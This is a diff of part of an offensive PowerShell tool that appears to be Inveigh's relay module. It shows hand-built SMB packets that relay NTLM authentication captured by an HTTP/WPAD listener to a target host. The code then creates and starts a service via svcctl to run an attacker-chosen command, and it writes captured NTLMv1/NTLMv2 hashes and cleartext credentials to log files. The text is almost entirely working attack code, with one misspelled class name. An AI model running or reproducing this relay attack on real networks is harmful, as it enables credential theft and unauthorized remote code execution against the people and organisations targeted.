New-Object System.String ($string_data,0,$string_data.Length) - return $string_extract } + } # SMB NTLM functions ScriptBlock - function for parsing NTLM challenge/response @@ -571,7 +625,7 @@ $SMB_relay_challenge_scriptblock = if($SMBRelayNetworkTimeout) { - $SMB_relay_challenge_timeout = new-timespan -Seconds $SMBRelayNetworkTimeout + $SMB_relay_challenge_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout $SMB_relay_challenge_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() while(!$SMB_relay_challenge_stream.DataAvailable) @@ -644,33 +698,33 @@ $SMB_relay_response_scriptblock = :SMB_relay_response_loop while ($j -lt 1) { $SMB_relay_response_send = 0x00,0x00 + - $SMB_netbios_length + - 0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00, - 0x00,0x00 + - $SMB_blob_length + - 0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 + - $SMB_byte_count + - 0xa1,0x82 + - $SMB_length_1 + - 0x30,0x82 + - $SMB_length_2 + - 0xa2,0x82 + - $SMB_length_3 + - 0x04,0x82 + - $SMB_NTLMSSP_length + - $HTTP_request_bytes + - 0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00 + $SMB_netbios_length + + 0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00, + 0x00,0x00 + + $SMB_blob_length + + 0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 + + $SMB_byte_count + + 0xa1,0x82 + + $SMB_length_1 + + 0x30,0x82 + + $SMB_length_2 + + 0xa2,0x82 + + $SMB_length_3 + + 0x04,0x82 + + $SMB_NTLMSSP_length + + $HTTP_request_bytes + + 0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00 $SMB_relay_response_stream.Write($SMB_relay_response_send,0,$SMB_relay_response_send.Length) $SMB_relay_response_stream.Flush() if($SMBRelayNetworkTimeout) { - $SMB_relay_response_timeout = New-Timespan -Seconds $SMBRelayNetworkTimeout + $SMB_relay_response_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout $SMB_relay_response_stopwatch = [Sustem.Diagnostics.Stopwatch]::StartNew() while(!$SMB_relay_response_stream.DataAvailable) @@ -751,45 +805,45 @@ $SMB_relay_execute_scriptblock = 0 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00, - 0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0xff,0xff + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00, - 0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30, - 0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00 + 0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0xff,0xff + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00, + 0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30, + 0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00 } 1 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00, - 0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08, - 0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 + 0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08, + 0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 } 2 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00, - 0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0, - 0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, - 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38, - 0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c, - 0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00, - 0x00 + 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, + 0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f, + 0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00, + 0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0, + 0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, + 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38, + 0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c, + 0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00, + 0x00 $SMB_multiplex_id = 0x05 } @@ -802,18 +856,18 @@ $SMB_relay_execute_scriptblock = 4 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, - 0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00, - 0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + - $SMB_service_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00 + 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00, + 0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f, + 0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, + 0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00, + 0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + + $SMB_service_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00 $SMB_multiplex_id = 0x07 } @@ -825,39 +879,39 @@ $SMB_relay_execute_scriptblock = 6 { - $SMB_relay_execute_send = [Array] 0x00 + - $SMB_service_data_length_bytes + - 0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00 + - $SMB_service_byte_count_bytes + - 0x00,0x00 + - $SMB_service_byte_count_bytes + - 0x3f,0x00,0x00,0x00,0x00,0x00 + - $SMB_service_byte_count_bytes + - 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 + - $SMB_service_byte_count_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c, - 0x00 + - $SMB_context_handler + - 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + - $SMB_service_bytes + - 0x00,0x00 + - $SMB_referent_ID_bytes + - 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + - $SMB_service_bytes + - 0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00 + - $SMB_relay_command_length_bytes + - 0x00,0x00,0x00,0x00 + - $SMB_relay_command_length_bytes + - $SMB_relay_command_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00 + $SMB_relay_execute_send = [Array]0x00 + + $SMB_service_data_length_bytes + + 0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, + 0xff,0xff,0xff,0xff,0x08,0x00 + + $SMB_service_byte_count_bytes + + 0x00,0x00 + + $SMB_service_byte_count_bytes + + 0x3f,0x00,0x00,0x00,0x00,0x00 + + $SMB_service_byte_count_bytes + + 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 + + $SMB_service_byte_count_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c, + 0x00 + + $SMB_context_handler + + 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + + $SMB_service_bytes + + 0x00,0x00 + + $SMB_referent_ID_bytes + + 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 + + $SMB_service_bytes + + 0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00 + + $SMB_relay_command_length_bytes + + 0x00,0x00,0x00,0x00 + + $SMB_relay_command_length_bytes + + $SMB_relay_command_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00 $SMB_multiplex_id = 0x09 } @@ -871,17 +925,17 @@ $SMB_relay_execute_scriptblock = 8 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00, - 0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00, - 0x00,0x00,0x00,0x13,0x00 + - $SMB_context_handler + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 + 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00, + 0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f, + 0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00, + 0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00, + 0x00,0x00,0x00,0x13,0x00 + + $SMB_context_handler + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 } 9 @@ -892,16 +946,16 @@ $SMB_relay_execute_scriptblock = 10 { $SMB_relay_execute_send = 0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00, - 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, - 0x00,0x00,0x00,0x08 + - $inveigh.process_ID_bytes + - $SMB_user_ID + - 0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00, - 0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f, - 0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, - 0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00, - 0x00,0x00,0x00,0x02,0x00 + - $SMB_context_handler + 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, + 0x00,0x00,0x00,0x08 + + $inveigh.process_ID_bytes + + $SMB_user_ID + + 0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00, + 0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f, + 0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00, + 0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00, + 0x00,0x00,0x00,0x02,0x00 + + $SMB_context_handler } 11 @@ -916,7 +970,7 @@ $SMB_relay_execute_scriptblock = if($SMBRelayNetworkTimeout) { - $SMB_relay_execute_timeout = New-Timespan -Seconds $SMBRelayNetworkTimeout + $SMB_relay_execute_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout $SMB_relay_execute_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() while(!$SMB_relay_execute_stream.DataAvailable) @@ -1052,25 +1106,26 @@ $SMB_relay_execute_scriptblock = # HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener $HTTP_scriptblock = { - param ($SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$WPADAuth) + param ($Challenge,$SMBRelayTarget,$SMBRelayCommand,$SMBRelayUsernames,$SMBRelayAutoDisable,$SMBRelayNetworkTimeout,$WPADAuth) function NTLMChallengeBase64 { + param ([String]$Challenge) $HTTP_timestamp = Get-Date $HTTP_timestamp = $HTTP_timestamp.ToFileTime() $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - if($Inveigh.challenge) + if($Challenge) { - $HTTP_challenge = $Inveigh.challenge - $HTTP_challenge_bytes = $Inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') + $HTTP_challenge = $Challenge + $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} } else { - $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $HTTP_challenge_bytes = [String](1..8 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) $HTTP_challenge = $HTTP_challenge_bytes -replace ' ','' $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} } @@ -1078,19 +1133,19 @@ $HTTP_scriptblock = $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, - 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 + - $HTTP_challenge_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, - 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, - 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, - 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, - 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, - 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, - 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, - 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, - 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + - $HTTP_timestamp + - 0x00,0x00,0x00,0x00,0x0a,0x0a + 0x00,0x00,0x00,0x05,0x82,0x89,0xa2 + + $HTTP_challenge_bytes + + 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, + 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, + 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, + 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, + 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, + 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, + 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, + 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, + 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + + $HTTP_timestamp + + 0x00,0x00,0x00,0x00,0x0a,0x0a $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) $NTLM = 'NTLM ' + $NTLM_challenge_base64 @@ -1185,9 +1240,9 @@ $HTTP_scriptblock = $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-","" $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000") $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2 - $SMB_domain_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes + $SMB_domain_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)] - $SMB_target_length = DataLength ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes + $SMB_target_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)] $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)] $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)] @@ -1212,13 +1267,13 @@ $HTTP_scriptblock = } else { - $NTLM = NTLMChallengeBase64 + $NTLM = NTLMChallengeBase64 $Challenge } } else { - $NTLM = NTLMChallengeBase64 + $NTLM = NTLMChallengeBase64 $Challenge } $inveigh.response.StatusCode = 401 @@ -1226,10 +1281,10 @@ $HTTP_scriptblock = elseif ($HTTP_request_bytes[8] -eq 3) { $NTLM = 'NTLM' - $HTTP_NTLM_offset = $HTTP_request_bytes[24] - $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes - $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes - $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes + $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes + $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes + $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes + $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*' $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) @@ -1240,13 +1295,15 @@ $HTTP_scriptblock = } else { - $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes + $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes } - $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes - $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes - $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes - $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes + $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes + $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes + $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes + $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes + $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes + $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes if($HTTP_NTLM_length -eq 24) # NTLMv1 { @@ -1406,7 +1463,7 @@ $control_relay_scriptblock = if($RunTime) { - $control_timeout = New-Timespan -Minutes $RunTime + $control_timeout = New-TimeSpan -Minutes $RunTime $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() } @@ -1467,31 +1524,31 @@ $control_relay_scriptblock = } - if($inveigh.file_output -and (!$inveigh.running -or !$inveigh.bruteforce_running)) + if($inveigh.file_output -and $inveigh.relay_file_output) { while($inveigh.log_file_queue.Count -gt 0) { $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append - $inveigh.log_file_queue.RemoveRange(0,1) + $inveigh.log_file_queue.RemoveAt(0) } while($inveigh.NTLMv1_file_queue.Count -gt 0) { $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append - $inveigh.NTLMv1_file_queue.RemoveRange(0,1) + $inveigh.NTLMv1_file_queue.RemoveAt(0) } while($inveigh.NTLMv2_file_queue.Count -gt 0) { $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append - $inveigh.NTLMv2_file_queue.RemoveRange(0,1) + $inveigh.NTLMv2_file_queue.RemoveAt(0) } while($inveigh.cleartext_file_queue.Count -gt 0) { $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append - $inveigh.cleartext_file_queue.RemoveRange(0,1) + $inveigh.cleartext_file_queue.RemoveAt(0) } } @@ -1528,7 +1585,7 @@ function HTTPListener() $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null - $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument( + $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument( $SMBRelayTarget).AddArgument($SMBRelayCommand).AddArgument($SMBRelayUsernames).AddArgument( $SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument($WPADAuth) > $null $HTTP_powershell.BeginInvoke() > $null @@ -1559,7 +1616,7 @@ if($RunTime -or $inveigh.file_output) ControlRelayLoop } -if(!$inveigh.running -and $inveigh.console_output) +if($inveigh.console_output) { :console_loop while($inveigh.relay_running -and $inveigh.console_output) @@ -1571,7 +1628,7 @@ if(!$inveigh.running -and $inveigh.console_output) if($inveigh.output_stream_only) { Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) + $inveigh.console_queue.RemoveAt(0) } else { @@ -1579,12 +1636,6 @@ if(!$inveigh.running -and $inveigh.console_output) switch -wildcard ($inveigh.console_queue[0]) { - "Inveigh *exited *" - { - Write-Warning 